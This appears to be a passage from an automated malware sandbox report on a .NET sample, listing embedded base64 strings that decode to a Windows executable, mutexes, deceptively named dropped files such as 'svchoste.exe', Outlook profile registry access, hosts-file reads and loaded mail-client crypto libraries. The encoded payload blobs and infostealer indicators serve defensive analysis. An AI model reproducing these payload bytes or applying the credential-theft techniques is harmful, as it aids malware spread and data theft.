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
Source: 5.2.dll.exe.10000.0.unpack, Forms.cs	Base64 encoded string: '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
Source: 5.0.dll.exe.10000.0.unpack, Forms.cs	Base64 encoded string: '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

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Mutant created: \Sessions\1\BaseNamedObjects\DA31A2B5902E335BCE2AB927B5D26FC7
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6504

Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe

Command line argument: 08A

6_2_00413780

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	Cryptographic APIs: 'CreateDecryptor'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformBlock'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: NapiNSP.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: pnrpnsp.pdbO source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source:	Binary string: System.Configuration.ni.pdbNW source: WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdbU source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: msvcrt.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbo source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: i.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb{ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source:	Binary string: ole32.pdba source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: edputil.pdbc source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: kernelbase.pdb0 source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp
Source:	Binary string: gdiplus.pdbX source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: WLDP.pdbG source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: clrjit.pdbD source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdbR source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS5 source: WER5768.tmp.dmp.29.dr
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ source: WER5768.tmp.dmp.29.dr
Source:	Binary string: _.pdbHD source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source:	Binary string: gpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbq source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: NapiNSP.pdb[ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: msvcp140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winrnr.pdb: source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdbO_ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER5768.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER5768.tmp.dmp.29.dr
Source:	Binary string: dpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: psapi.pdbz source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: kernelbase.pdb source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER5768.tmp.dmp.29.dr
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
